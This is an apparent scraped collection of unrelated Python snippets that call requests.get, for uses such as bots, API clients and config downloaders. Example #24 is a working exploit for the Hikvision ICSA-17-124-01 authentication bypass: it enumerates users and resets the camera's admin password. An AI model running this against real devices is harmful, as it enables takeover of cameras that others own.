Пример #1
0
def obj():
    """Twilio voice handler: play a random DPLA sound recording from the
    Kentucky Digital Library matching the year the caller keyed in."""
    year = request.values.get('Digits', None)
    response = twiml.Response()
    params = {
        "sourceResource.type": "sound",
        "provider.name": "Kentucky Digital Library",
        "sourceResource.date.begin": str(year),
        "api_key": api_key,
        "page_size": 100
    }
    url = "http://api.dp.la/v2/items/?%s" % urllib.urlencode(params)
    results = rget(url).json()
    if not results['docs']:
        response.say("Sorry, nothing matched your query.")
    else:
        # Pick a random hit from the returned page (count may exceed the page).
        limit = min(results['count'], params['page_size']) - 1
        chosen = results['docs'][random.randint(0, limit)]
        stream = chosen['object'].replace("_tb.mp3", ".mp3")
        response.say("You are about to listen to: " + chosen['sourceResource']['title'] + ". "
                     + "This item is from " + chosen['dataProvider'] + ".")
        response.play(stream)
    return str(response)
Пример #2
0
def is_message_signature_valid(msg):
    """Verify the SHA1-with-RSA signature on an Amazon SNS message.

    Checks the signature version, ensures the signing certificate is hosted
    on an https amazonaws.com URL, downloads the certificate, rebuilds the
    canonical string for the message type and verifies it against the
    base64-encoded 'Signature' field.

    Returns True when the signature verifies; raises Exception otherwise.
    """
    if msg[u'SignatureVersion'] != '1':
        raise Exception('Wrong signature version')

    signing_url = msg[u'SigningCertURL']
    prog = regex_compile(r'^https://sns\.[-a-z0-9]+\.amazonaws\.com/.*$', IGNORECASE)
    if not prog.match(signing_url):
        # Bug fix: the URL was previously passed as a second Exception
        # argument (logging-style) and never interpolated into the message.
        raise Exception("Cert is not hosted at AWS URL (https): %s" % signing_url)

    r = rget(signing_url)
    cert = X509.load_cert_string(str(r.text))
    if msg[u'Type'] == 'Notification':
        str_to_sign = build_notification_string(msg)
    elif msg[u'Type'] in ('SubscriptionConfirmation', 'UnsubscribeConfirmation'):
        str_to_sign = build_subscription_string(msg)
    else:
        # Bug fix: an unrecognized type previously left str_to_sign as None
        # and crashed with AttributeError on .encode(); fail explicitly.
        raise Exception('Unknown message type: %s' % msg[u'Type'])

    pubkey = cert.get_pubkey()
    pubkey.reset_context(md='sha1')
    pubkey.verify_init()
    pubkey.verify_update(str_to_sign.encode())
    result = pubkey.verify_final(b64decode(msg['Signature']))
    if result != 1:
        raise Exception('Notification could not be confirmed')
    else:
        return True
Пример #3
0
 def get(self, agency, stop_id):
     """Query the agency endpoint for a stop and return the transformed JSON.

     Sets up the request parameters for *agency*/*stop_id*, issues the GET,
     and pipes the raw response through ``transform``.
     """
     self.set_params(agency, stop_id)
     return self.transform(rget(self.api_url, params=self.params))
Пример #4
0
 def download_image(self, url):
     """Stream *url* into the 'unsorted' content directory, keeping its basename.

     Any failure is logged rather than raised.
     """
     try:
         LOGGER.info('downloading %s' %(url))
         name = url.split('/')[-1]
         response = rget(url, stream=True)
         if response.status_code != 200:
             return
         with open(path.join(CONTENTSUB['unsorted'], name), 'wb') as sink:
             for piece in response.iter_content(1024):
                 sink.write(piece)
         LOGGER.info('done: %s' %(name))
     except Exception as ex:
         LOGGER.error('download error %s %s' %(url, ex))
Пример #5
0
def startWeb(p,resourcePath,nonesym,timec,timebg,btc,btbg,etc,etbg,showetflag,showbtflag):
    """Start the web UI server in a separate process and check it came up.

    Copies all display settings into module globals, spawns the worker
    process, waits a few seconds and polls the local /status endpoint.
    Returns True when the server answered 200, False on any failure.
    """
    global port, process, static_path, nonesymbol, timecolor, timebackground, btcolor, btbackground, etcolor, etbackground, showet, showbt
    try:
        port = p
        static_path = resourcePath
        nonesymbol = nonesym
        timecolor = timec
        timebackground = timebg
        btcolor = btc
        btbackground = btbg
        etcolor = etc
        etbackground = etbg
        showet = showetflag
        showbt = showbtflag
        # SIGQUIT does not exist on Windows, so only hook it elsewhere.
        if psystem() != 'Windows':
            gsignal(SIGQUIT, kill)
        
        # start the server in a separate process
# using multiprocessing
        process = mProcess(target=work,args=(
            port,
            resourcePath,
            nonesym,
            timec,
            timebg,
            btc,
            btbg,
            etc,
            etbg,
            showetflag,
            showbtflag,))
        process.start()
       
        # Give the server time to bind before probing it.
        libtime.sleep(4)
        
        # check successful start
        url = "http://127.0.0.1:" + str(port) + "/status"
        r = rget(url,timeout=2)
        
        if r.status_code == 200:
            return True
        else:
            return False

    # Deliberate best-effort: any failure (spawn, timeout, connection
    # refused) is reported as False rather than propagated.
    except Exception:
#        import traceback
#        import sys
#        traceback.print_exc(file=sys.stdout)
        return False
Пример #6
0
def subscribe(subscription_arn):
    """Confirm a pending SNS subscription and flash the outcome to the user."""
    subscription = Subscription.query.get(subscription_arn)
    if subscription.status != 0:
        flash(u'Subscription already confirmed!', 'danger')
    else:
        response = rget(subscription.subscribe_url)
        if response.status_code == 200:
            subscription.status = 1
            db.session.commit()
            flash(u'Subscription confirmed!', 'success')
        else:
            flash(u'Subscription not confirmed! Response code was %i' %
                  response.status_code, 'danger')
    return redirect(url_for('show_subscription',
                    subscription_arn=subscription.arn))
Пример #7
0
def unsubscribe(subscription_arn):
    """Request unsubscription of a confirmed SNS subscription.

    Requires an unsubscribe URL (only known after a message was received)
    and a currently-confirmed subscription (status == 1); flashes the
    outcome and redirects back to the subscription page.
    """
    subscription = Subscription.query.get(subscription_arn)
    if not subscription.unsubscribe_url:
        flash(u'A message must be received to unsubscribe', 'danger')
    elif subscription.status == 1:
        r = rget(subscription.unsubscribe_url)
        if r.status_code == 200:
            subscription.status = 2
            db.session.commit()
            # Bug fix: message said "Ubsubscription".
            flash(u'Unsubscription request sent!', 'success')
        else:
            # Bug fix: the original passed a *tuple* of strings to flash();
            # join the pieces into a single message string (cf. subscribe()).
            flash(u'Unsubscription request unsuccessful!'
                  u' Response code was %i' % r.status_code, 'danger')
    else:
        flash(u'Subscription is not valid to be unsubscribed!', 'danger')
    return redirect(url_for('show_subscription',
                    subscription_arn=subscription.arn))
Пример #8
0
    rhash = sha512(str(rhash).encode('utf-8')).hexdigest()
    
    try:
        f = open(rfile, 'rb', 0)
        m = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
        nohash = True if m.find(rhash.encode()) == -1 else False
    except (ValueError, FileNotFoundError):
        nohash = True
        
    if nohash:
        with open(rfile, 'a') as f:
            f.write(rhash + '\n')
    
    return nohash

# Fetch Rockstar newswire posts carrying tag 702 and prepare mail alerts
# for posts that mention an in-game cash amount and have not been seen yet.
data = rget('https://www.rockstargames.com/newswire/tags.json?tags=702')
page = data.json()
# NOTE(review): '[1-10]' is a character *class* matching only '1' or '0',
# not the range 1..10 — this probably does not match the intended
# 'GTA$<amount>' patterns; confirm and fix the expression.
regx = re.compile('GTA\$[1-10]')

mail_list = [ '*****@*****.**' ]

for post in page['posts']:
    blurb = post['blurb']
    title = post['title']
    hash_file = '/home/admin/bin/blurb_hashes.txt'

    # Only alert on new posts: no_hash() records and deduplicates titles.
    if (regx.search(blurb) or regx.search(title)) and no_hash(title, hash_file):
        msg = mtext(blurb, 'html')
        # Strip HTML tags from the title for the subject line.
        msg['Subject'] = re.sub('<[^<]+?>', '', post['title'])
        msg['From'] = '*****@*****.**'
        
Пример #9
0
def handle_file(path):
    """Download https://habr.com<path> and save it locally under the same
    relative path, creating intermediate directories as needed."""
    response = rget('https://habr.com' + path)
    # Bug fixes vs. original: compute the directory once; guard against the
    # empty string (os.makedirs('') raises FileNotFoundError for top-level
    # paths); use exist_ok=True instead of a racy exists() check; and close
    # the output file deterministically via a context manager.
    directory = "/".join(path.lstrip("/").split("/")[:-1])
    if directory:
        os.makedirs(directory, exist_ok=True)
    with open(path.lstrip("/"), 'wb') as f:
        f.write(response.content)
Пример #10
0
async def time_new(message, client, arguments):
    """Reply in the channel with the current time.

    With no arguments, reports the host server's local time. Otherwise
    geocodes the given place via the Google Maps Geocoding API, resolves
    its timezone via the Timezone API, and reports the local time and
    weekday there.
    """

    if not arguments:
        letter = ":clock11: **| Servers time is " + str(
            datetime.fromtimestamp(mfloor(time())).strftime('%H:%M')) + "**"
        await client.send_message(message.channel, letter)
        return

    else:
        google = quote(str(arguments))
        query = "https://maps.googleapis.com/maps/api/geocode/json?address={}&key={}&language={}".format(
            google, google_api_key, "en")
        response = loads(rget(query).text)

        if response["status"] == "OK":

            # getting lat and lng, rounded to 4 decimal places
            lat = str(
                float("{0:.4f}".format(
                    response["results"][0]["geometry"]["location"]["lat"])))
            lng = str(
                float("{0:.4f}".format(
                    response["results"][0]["geometry"]["location"]["lng"])))

            # Getting time by place
            query = "https://maps.googleapis.com/maps/api/timezone/json?location=%s,%s&timestamp=%s&key=%s&language=%s" % (
                lat, lng, time(), google_api_key, "en")
            time_in_location = loads(rget(query).text)

            # Calculating local time = UTC now + raw offset + DST offset
            time_now = str(
                int(time() + time_in_location["rawOffset"] +
                    time_in_location["dstOffset"]))
            time_in_hour_format = datetime.fromtimestamp(
                int(time_now)).strftime('%H:%M')
            time_in_weekday = datetime.fromtimestamp(int(time_now)).weekday()

            # Idiom fix: weekday() returns 0 (Monday) .. 6 (Sunday); use a
            # lookup table instead of the original seven-branch if/elif chain.
            day_is = ("Monday", "Tuesday", "Wednesday", "Thursday",
                      "Friday", "Saturday", "Sunday")[time_in_weekday]

            # Sending message (variable renamed from the original placeholder)
            reply = ":clock11: **| Time in {} is {} and the day is {}**".format(
                str(response["results"][0]["formatted_address"]),
                time_in_hour_format, day_is)
            await client.send_message(message.channel, reply)
            return

    send(1, "Time done!")
Пример #11
0
def get_gh_data(username):
    """Return the GitHub public events feed for *username* as parsed JSON."""
    response = rget(
        f"https://api.github.com/users/{username}/events",
        headers={"Authorization": f"Bearer {TOKEN}"},
    )
    return response.json()
Пример #12
0
def scrape(url):
    """Fetch *url* and return its JSON payload; print and return None on failure."""
    try:
        payload = rget(url).json()
    except Exception as ex:
        print('Error: %s' % (ex))
        return None
    return payload
Пример #13
0
# Start each run with an empty log file so old entries do not accumulate.
if ospath.exists('log.txt'):
    with open('log.txt', 'r+') as f:
        f.truncate(0)

# Log to both log.txt and the console.
logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    handlers=[logging.FileHandler('log.txt'),
              logging.StreamHandler()],
    level=logging.INFO)

# Optionally bootstrap config.env from a remote URL before loading it.
CONFIG_FILE_URL = environ.get('CONFIG_FILE_URL', None)
try:
    # len(None) also raises TypeError, so both "unset" and "empty string"
    # fall through to the outer `except TypeError: pass`.
    if len(CONFIG_FILE_URL) == 0:
        raise TypeError
    try:
        res = rget(CONFIG_FILE_URL)
        if res.status_code == 200:
            with open('config.env', 'wb+') as f:
                f.write(res.content)
                f.close()  # redundant inside `with`; kept as-is
        else:
            logging.error(f"Failed to download config.env {res.status_code}")
    except Exception as e:
        logging.error(f"CONFIG_FILE_URL: {e}")
except TypeError:
    pass

# Load config.env into the environment, overriding existing values.
load_dotenv('config.env', override=True)

UPSTREAM_REPO = environ.get('UPSTREAM_REPO', None)
try:
Пример #14
0
 async def meme(self, ctx):
     """Fetch a random meme from meme-api and post it as an embed."""
     data = rget('https://meme-api.herokuapp.com/gimme').json()
     embed = Embed(title=f":speech_balloon: r/{data['subreddit']} :",
                   color=0x3498db)
     embed = embed.set_image(url=data['url'])
     embed = embed.set_footer(text=data['postLink'])
     await ctx.send(embed=embed)
Пример #15
0
from requests import get as rget

# Browser-like request headers; NOTE(review): presumably required for the
# data endpoint to accept the request (origin/referer check) — confirm.
headers = {
	'authority': 'data.miningpoolstats.stream',
	'accept': 'application/json, text/javascript, */*; q=0.01',
	'sec-fetch-dest': 'empty',
	'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36',
	'origin': 'https://miningpoolstats.stream',
	'sec-fetch-site': 'same-site',
	'sec-fetch-mode': 'cors',
	'referer': 'https://miningpoolstats.stream/monero',
	'accept-language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' 
}


# Monero pool statistics feed; the t= value looks like a cache-buster.
link = 'https://data.miningpoolstats.stream/data/monero.js?t=1587210437'

# Emit a YARA-style string rule line for every pool entry with a pool_id.
for line in rget(link, headers=headers).json().get('data'):
	if line.get('pool_id'): print('$ = "{}" ascii fullword'.format(line.get('pool_id')))

Пример #16
0
# Module-level logger for this file.
LOGGER = logging.getLogger(__name__)

# Load config.env into the process environment, overriding existing values.
load_dotenv('config.env', override=True)


def getConfig(name: str):
    """Return the environment variable *name*; raises KeyError when unset."""
    value = environ[name]
    return value


# Optionally bootstrap .netrc credentials from a remote URL; silently
# skipped when NETRC_URL is unset (getConfig raises KeyError) or empty.
try:
    NETRC_URL = getConfig('NETRC_URL')
    if len(NETRC_URL) == 0:
        raise KeyError
    try:
        res = rget(NETRC_URL)
        if res.status_code == 200:
            with open('.netrc', 'wb+') as f:
                f.write(res.content)
                f.close()  # redundant inside `with`; kept as-is
        else:
            logging.error(f"Failed to download .netrc {res.status_code}")
    except Exception as e:
        logging.error(f"NETRC_URL: {e}")
except KeyError:
    pass
try:
    SERVER_PORT = getConfig('SERVER_PORT')
    if len(SERVER_PORT) == 0:
        raise KeyError
except KeyError:
Пример #17
0
    def fetch_git(self):
        """Fetch nginx/haproxy config files for every configured server from GitLab.

        For each server: resolve the project id (<group>%2F<server>), take
        the latest commit sha, download the first known config filepath that
        exists at that sha, inline its ``include`` directives, and write the
        result to ``<self.configs>/<basename>.<server>.all``.
        """
        try:
            servers = self.settings.get("git", "servers").split(",")
            auth = {'PRIVATE-TOKEN': self.settings.get("git", "token")}
            url = ("https://%s/api/v3/projects" %
                   self.settings.get("git", "host"))
            for server in servers:
                try:
                    # Project path is group%2Fserver (URL-encoded slash).
                    id_proj = rget(
                        "%s/%s%%2F%s" %
                        (url, self.settings.get("git", "group"), server),
                        headers=auth
                    ).json()[u'id']
                # Bug fix: the original used bare `except:` here and below,
                # which also swallowed SystemExit/KeyboardInterrupt.
                except Exception:
                    logging.warning("Repository %s does not exists" % server)
                else:
                    sha = rget(
                        "%s/%s/repository/commits" % (url, id_proj),
                        headers=auth).json()[0][u'id']
                    for filepath in ['usr/local/etc/nginx/nginx.conf',
                                     'usr/local/etc/haproxy/haproxy.cfg',
                                     'etc/nginx/nginx.conf',
                                     'etc/haproxy/haproxy.cfg',
                                     'nginx.conf']:
                        try:
                            params = {'filepath': filepath}
                            main_file = rget(
                                "%s/%s/repository/blobs/%s" %
                                (url, id_proj, sha),
                                params=params, headers=auth)
                            if main_file.status_code != 200:
                                continue
                            with open(
                                pjoin(
                                    self.configs,
                                    "%s.%s.all" %
                                    (splitext(basename(filepath))[0], server)
                                ), "w"
                            ) as config:
                                main_file = main_file.text

                                # Inline every `include <path>;` directive
                                # whose blob exists at the same sha.
                                for incl in findall(
                                    r"(?:^i|^[ \t]+i)nclude (.+?);$",
                                    main_file, REM
                                ):
                                    try:
                                        params = {
                                            'filepath':
                                            pjoin(dirname(filepath), incl)
                                        }
                                        include_file = rget(
                                            "%s/%s/repository/blobs/%s"
                                            % (url, id_proj, sha),
                                            params=params, headers=auth)
                                        if include_file.status_code == 200:
                                            main_file = main_file.replace(
                                                "include " + incl + ";",
                                                include_file.text)
                                    except Exception:
                                        pass
                                config.write(main_file)
                        except Exception:
                            pass
        except Exception:
            logging.error("can't fetch from GitLab: %s" %
                          self.settings.get('git', 'host'))
Пример #18
0
    def write(self, cat):
        """Render the status table template for category *cat*.

        Collects the set of server columns seen for the category, orders the
        services, runs HTTP health/SEO probes for "web"/"promo" services,
        assembles per-server cell data (including NS/TXT handling for NIC
        categories) and returns the rendered HTML.
        """
        # Union of server names across all services; collapse aliases via
        # the same_hosts regex when it matches.
        servers = set()
        for service in self.services[cat].keys():
            for server_name in self.services[cat][service].keys():
                try:
                    server_name = self.same_hosts.search(server_name).group(1)
                except (AttributeError, IndexError):
                    pass
                servers.add(server_name)
        servers = sorted(servers)
        columns = servers + ["author"]
        # Bucket 0: services present on several servers; bucket 1:
        # single-server services (always bucket 1 for DNS/NIC categories),
        # which also record the column index of their lone server ("zone").
        services1 = {0: [], 1: []}
        for service in self.services[cat].keys():
            c = (0 if len(self.services[cat][service].keys()) > 1 and
                 "DNS" not in cat and "NIC" not in cat else 1)
            services1[c].append(
                (service, None if c < 1
                 else servers.index(
                    next(iter(self.services[cat][service].keys()))
                 ))
            )

        def skip_www(cs):
            # Use for sorting: ignore a leading "www." so names group together.
            s = cs[0]
            if len(s) > 4 and "www." in s[:4]:
                return s[4:] + " "
            else:
                return s

        services = (
            sorted(services1[0], key=skip_www) +
            sorted(services1[1], key=skip_www)
        )
        result_services = []
        for (service, zone) in services:
            errors = False
            result_service = {'zone': zone}

            # A leading "." marks the service; strip it but remember it.
            clear_service = service
            dotted = False
            if clear_service[0] == ".":
                clear_service = clear_service[1:]
                dotted = True
            if ":443" in clear_service:
                clear_service = "https://" + clear_service.replace(":443", "")
            result_service['service'] = clear_service
            result_service['dotted'] = dotted
            # Services hosted on a configured "skipped" server are exempt
            # from the HTTP probes below.
            skipped_cat = False
            try:
                for candidate in self.settings.get("git",
                                                   "skipped").split(","):
                    if candidate in self.services[cat][service].keys():
                        skipped_cat = True
                        break
            except parseError:
                pass
            if (cat == "web" or cat == "promo") and not skipped_cat:
                history = 0
                if "https://" in clear_service:
                    url = clear_service
                else:
                    url = "http://" + clear_service
                url = url.split(",")[0]
                try:
                    if cat == "promo":
                        # Promo sites get extra SEO checks: favicon,
                        # robots.txt, sitemap.xml and on-page tags.
                        r = rget("%s/favicon.ico" % url, timeout=5)
                        if r.status_code != 200:
                            result_service['no_fav'] = True
                        elif "image/x-icon" not in r.headers['content-type']:
                            result_service['bad_fav'] = True
                        history += len(r.history)
                        r = rget("%s/robots.txt" % url, timeout=5)
                        if r.status_code != 200:
                            result_service['no_robots'] = True
                        elif "text/plain" not in r.headers['content-type']:
                            result_service['bad_robots'] = True
                        history += len(r.history)
                        r = rget("%s/sitemap.xml" % url, timeout=5)
                        if r.status_code != 200:
                            result_service['no_sitemap'] = True
                        elif "text/xml" not in r.headers['content-type']:
                            result_service['bad_sitemap'] = True
                        r = rget(url, timeout=5)
                        history += len(r.history)
                        if len(r.history):
                            result_service['redirect'] = True
                        if r.headers.get('x-powered-by'):
                            result_service['x_powered_by'] = True
                        # Flag duplicated values inside any response header
                        # (except set-cookie, which legitimately repeats).
                        for head_name, header in r.headers.items():
                            if "set-cookie" in head_name:
                                continue
                            h = list(
                                map(lambda s: s.strip(), header.split(","))
                            )
                            if len(h) > len(set(h)):
                                result_service['double_header_same'] = True
                                break

                        if "<h1" not in r.text:
                            result_service['no_h1'] = True
                        if "<title" not in r.text:
                            result_service['no_title'] = True
                        if 'name="description"' not in r.text:
                            result_service['no_description'] = True

                    else:
                        r = rget(url, timeout=5)
                        history += len(r.history)
                        if len(r.history):
                            result_service['redirect'] = True
                        if r.headers.get('x-powered-by'):
                            result_service['x_powered_by'] = True
                        for head_name, header in r.headers.items():
                            if "set-cookie" in head_name:
                                continue
                            h = list(
                                map(lambda s: s.strip(), header.split(","))
                            )
                            if len(h) > len(set(h)):
                                result_service['double_header_same'] = True
                                break

                except SSLError:
                    result_service['insecure'] = True
                except Exception as e:
                    result_service['no_url'] = e

            # Build one cell per server column; None means "not hosted here".
            result_service['servers'] = []
            for server in servers:
                if server not in self.services[cat][service].keys():
                    # A NIC service missing from an NS column is an error.
                    if "NIC" in cat and "NS" in server:
                        errors |= True
                    result_service['servers'].append(None)
                    continue

                if "NIC" in cat and "NS" in server:
                    temp_result = []
                    for ip, stat in sorted(
                            self.services[cat][service][server]):
                        temp_result.append({'ip': ip, 'stat': stat})
                        if not stat:
                            errors |= True
                    result_service['servers'].append(temp_result)

                elif "TXT" not in server:
                    result_service['servers'].append(
                        [{'ip': ip}
                         for ip in sorted(self.services[cat][service][server])]
                    )
                # TXT columns carry SPF/DMARC status for delegated domains.
                if "NIC" in cat and "TXT" in server:
                    if u"Не делегирован" not in u"".join(
                            self.services[cat][service]["    Status"]):
                        spf, dmarc = self.services[cat][service][server]
                        result_service['servers'].append(
                            [{'ip': 'spf ', 'spf': spf},
                             {'ip': 'dmarc ', 'dmarc': dmarc}]
                        )
                        if spf or dmarc:
                            errors |= True

            if cat == "web" or cat == "promo" or cat == "stream":
                result_service['author'] = " ".join(
                    filter(len, self.authors.get(service, {}))
                )
            result_service['errors'] = errors

            result_services.append(result_service)

        # Prefer a category-specific template; fall back to the generic table.
        try:
            template = self.tpl.get_template(cat + ".html")
        except TemplateNotFound:
            template = self.tpl.get_template("_table.html")

        return template.render(services=result_services,
                               columns=columns,
                               servers=servers,
                               cat=cat)
Пример #19
0
    data['token'] = token
    with open("config.json", "w", encoding="utf-8") as token_:
        token_.write(json.dumps(data, indent=4))

# NOTE(review): `data` and `token` are presumably defined earlier in this
# file (config.json loading) — confirm against the full module.
user = User(data['token'], mobile=True)


from src.commands import iris,id,signals,time, like, calc,wiki,msgdel,addfriends,commentadd,info,random,online,commands,shubs
import unit
from requests import get as rget
from unit import __version__, __author__, __namelp__
# Register every command blueprint with the userbot instance.
user.set_blueprints(time.bp,unit.bp,like.bp,
calc.user,wiki.bp,msgdel.bp,
addfriends.bp,info.bp,commentadd.bp,
random.bp,online.bp,commands.bp,shubs.bp,signals.bp, id.bp,iris.bp)
# Resolve the account's own VK user id via the VK API (version 5.52).
user_id = (rget(f'https://api.vk.com/method/users.get?&v=5.52&access_token={token}').json())['response'][0]['id']
async def start():
    from unit import __author__, __version__, __namelp__
    text = f"""
📘 {__namelp__} LP запущен.
📕 Версия LP: {__version__}
📙 Автор: {__author__}
    """
    await user.api.messages.send(peer_id=user_id, message=text, random_id=0)
    from loguru import logger as lg
    from prefixs import p
    from prefixs import stickerforstart, error_stickerforstart
    from unit import __version__, __author__


    red = lg.level("[LenderLP]", no=38, color="<yellow>")
Пример #20
0
def look_for_new_video():
    """
    Looks for the new video of the channel specified.

    Polls the YouTube Data API every 30 seconds until the latest video id
    changes, then raises a desktop notification, announces the title by
    speech, and opens the video in the default browser. Runs until a new
    video is found or the process is interrupted.
    """

    # api key and channel id
    api_key = "YOUTUBE API KEY HERE"  # GET IT FROM HERE https://console.developers.google.com/apis/api/youtube.googleapis.com
    channel_id = "CHANNEL ID YOU WANT TO TRACK"
    channel_name = "CHANNEL NAME YOU WANT TO TRACK"

    # base video url for youtube
    # base search url for the video search using youtube api
    base_video_url = "https://www.youtube.com/watch?v="
    base_search_url = "https://www.googleapis.com/youtube/v3/search?"

    # main url for api search (newest upload first, single result)
    url = base_search_url + f"key={api_key}&channelId={channel_id}&part=snippet,id&order=date&maxResults=1"

    # initialising old video id
    r = rget(url).text
    parser = jloads(r)
    old_vidID = (parser['items'][0]['id']['videoId'])

    # intialising toaster object for notifications
    toaster = ToastNotifier()

    tries = 0
    while True:
        # initialising the new video url until new video is published
        r = rget(url).text
        parser = jloads(r)
        new_vidID = (parser['items'][0]['id']['videoId'])

        # when new video is not published, i.e. new video id is same as old video id
        if new_vidID == old_vidID:
            tries += 1
            print(f"Try {tries}: No new video!")
            sleep(30)

        # when new video has been published, i.e. new video id is different
        else:
            try:
                # fetching video title from the api data
                title = parser['items'][0]['snippet']['title']

                # alerting the user by a notification and speaking
                toaster.show_toast(
                    f"Youtube Tracker",
                    f"New video from {channel_name} has arrived!\nTitle: {title}",
                    duration=5)

                speak(f"New video has arrived! Title is:")
                speak(title)

                # opening the video on the default browser
                videoURL = base_video_url + new_vidID
                webbrowser.open(videoURL)

            except KeyboardInterrupt:
                raise SystemExit

            except Exception as e:
                print(e)
                raise SystemExit
Пример #21
0
 def url_scrape(self, url, split=False):
     """Fetch *url* and return its body text, split into lines when *split*.

     Any failure is logged and None is returned.
     """
     try:
         LOGGER.info('scraping %s' %(url))
         body = rget(url).text
         return body.split('\n') if split else body
     except Exception as ex:
         LOGGER.error('scrape error %s %s' %(url, ex))
Пример #22
0
 def get_response_from_link(self, url: str) -> Response:
     """Issue a GET request to *url* and return the raw Response object."""
     response = rget(url)
     return response
Пример #23
0
def scrape(url):
    """Return the decoded JSON from *url*, or None (after printing) on any error."""
    result = None
    try:
        result = rget(url).json()
    except Exception as ex:
        print('Error: %s' %(ex))
    return result
Пример #24
0
def icsa_17_124_01(target, action) -> bool:
    """Detect vulnerability ICSA-17-124-01 or exploit it to change 'admin' password.\n"""
    global HOSTS
    ip_a = str(target)
    # 'YWRtaW46MTEK' is base64 for "admin:11\n" — the magic auth value that
    # bypasses authentication on vulnerable Hikvision firmware.
    params = {'auth': 'YWRtaW46MTEK'}
    if action == 'detect':
        # Detection: if the user list endpoint answers 200 with the magic
        # auth param, the device is vulnerable; record its users in HOSTS.
        url = f'http://{ip_a}/Security/users'
        try:
            r = rget(url=url, params=params, timeout=10)
            if r.status_code == 200:
                try:
                    r_xmlroot = etree.fromstring(r.content)
                    for actual_user in r_xmlroot:
                        HOSTS[ip_a].user_list.add(
                            HikUser(
                                user_id=actual_user.find('id').text,
                                user_name=actual_user.find('userName').text,
                                priority=actual_user.find('priority').text,
                                user_level=actual_user.find('userLevel').text))
                    return True
                except Exception as exception:
                    print(exception)
                    print(
                        '[!] Error: Failed to understand device response and enumerate users.\nResponse:'
                    )
                    print(r.content)
                    return False
            else:
                return False
        except rexceptions.Timeout:
            print('Connection timed out! Host may no be reachable.')
            return False
    elif action == 'password_change':
        # Exploit: PUT a new password for user id 1 ('admin') using the
        # same auth bypass; prompt until the password length is acceptable.
        while True:
            psw = getpass(
                '\nEnter a password composed by numbers and letters (8-12 characters):\n\t>>> '
            )
            if 8 <= len(psw) <= 12:
                break
        url = f'http://{ip_a}/Security/users/1'
        xml = f'<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema"><id>1</id>' \
              f'<userName>admin</userName><password>{psw}</password></User>'
        try:
            r = rput(url=url, params=params, data=xml, timeout=10)
            if r.status_code == 200:
                try:
                    # Success is statusCode 1 with statusString "OK".
                    r_xmlroot = etree.fromstring(r.content)
                    if int(
                            r_xmlroot.find('statusCode').text
                    ) == 1 and r_xmlroot.find('statusString').text == 'OK':
                        return True
                except Exception as exception:
                    print(exception)
                    print(
                        '[!] Error: Failed to understand device response to psw change.\nResponse:'
                    )
                    print(r.content)
                    return False
            else:
                return False
        except rexceptions.Timeout:
            print('Connection timed out! Host may no be reachable.')
            return False
Пример #25
0
from time import sleep
from requests import get as rget
from os import environ
from logging import error as logerror

# Keep-alive pinger: periodically GET the bot's own web endpoint so the
# hosting platform does not idle the app.
# Bug fix: the original called .rstrip("/") before checking for None, so an
# unset BASE_URL_OF_BOT crashed with AttributeError at import time.
BASE_URL = environ.get('BASE_URL_OF_BOT', None)
if BASE_URL:
    # An empty (or slashes-only) value is treated the same as unset.
    BASE_URL = BASE_URL.rstrip("/") or None
else:
    BASE_URL = None
PORT = environ.get('PORT', None)
# Only ping when both a port and a base URL are configured.
if PORT is not None and BASE_URL is not None:
    while True:
        try:
            rget(BASE_URL).status_code
            sleep(600)  # ping every 10 minutes
        except Exception as e:
            logerror(f"alive.py: {e}")
            sleep(2)  # brief back-off before retrying
            continue
Пример #26
0
def startWeb(p, resourcePath, nonesym, timec, timebg, btc, btbg, etc, etbg,
             showetflag, showbtflag):
    """Launch the WebLCDs server in a child process and verify it started.

    Publishes the display settings through module-level globals, runs the
    server entry point ``work`` via multiprocessing, waits a grace period,
    then probes ``/status`` on localhost to confirm the server came up.

    Returns:
        True if the child process is alive and answered the status probe
        with HTTP 200, False otherwise.
    """
    global port, process, static_path, nonesymbol, timecolor, timebackground, btcolor, btbackground, etcolor, etbackground, showet, showbt
    port = p
    static_path = resourcePath
    nonesymbol = nonesym
    timecolor = timec
    timebackground = timebg
    btcolor = btc
    btbackground = btbg
    etcolor = etc
    etbackground = etbg
    showet = showetflag
    showbt = showbtflag
    if psystem() != 'Windows':
        # SIGQUIT does not exist on Windows; elsewhere use it for shutdown.
        gsignal(SIGQUIT, kill)

    # Start the server in a separate process using multiprocessing.
    if psystem() == 'Darwin':
        try:
            # The start method can only be set once per process.
            # 'fork' (Python 3.7 default on Unix/macOS) is considered unsafe
            # on macOS (https://bugs.python.org/issue33725) and 'spawn'
            # (Python 3.8 default on macOS, always on Windows) breaks
            # WebLCDs in py2app/pyinstaller builds
            # (https://bugs.python.org/issue32146,
            #  https://github.com/pyinstaller/pyinstaller/issues/4865),
            # so prefer 'forkserver' where available (Unix-only; not
            # supported by frozen pyinstaller executables as of 3.8).
            if "forkserver" in mp.get_all_start_methods():
                mp.set_start_method('forkserver')
        except Exception:
            # set_start_method raises RuntimeError if already set; narrowed
            # from a bare ``except:`` so SystemExit/KeyboardInterrupt still
            # propagate.
            pass
    process = mp.Process(name='WebLCDs',
                         target=work,
                         args=(
                             port,
                             resourcePath,
                             nonesym,
                             timec,
                             timebg,
                             btc,
                             btbg,
                             etc,
                             etbg,
                             showetflag,
                             showbtflag,
                         ))
    process.start()

    # Give the server time to bind its port before probing it.
    libtime.sleep(4)

    if not process.is_alive():
        return False

    # Check for a successful start by probing the status endpoint.
    url = "http://127.0.0.1:" + str(port) + "/status"
    try:
        r = rget(url, timeout=2)
    except Exception:
        # Connection refused / timed out: report a failed start instead of
        # letting the exception escape — callers expect a bool.
        return False
    return r.status_code == 200
Пример #27
0
async def ao_ruoka(message, client, arguments):
    """Scrape the Lounastuuli lunch menus and post them to the channel.

    Without arguments: post only today's menu, bolded (or next Monday's on
    weekends). With any argument: post the whole week, with a separator
    before the next-week entry. Sends nothing when no menu applies.
    """
    # Fetch and parse the menu page.
    page = rget(
        "https://www.jao.fi/fi/Jyvaskylan-koulutuskuntayhtyma/Asiakaspalvelut/Palvelut-Jyvaskylassa/Opiskelijaravintolat/Lounastuuli"
    )
    soup = BeautifulSoup(page.content, "lxml")

    # One entry per day: ["__Dayname__:", lunch, lunch, ...]
    week_menu = []
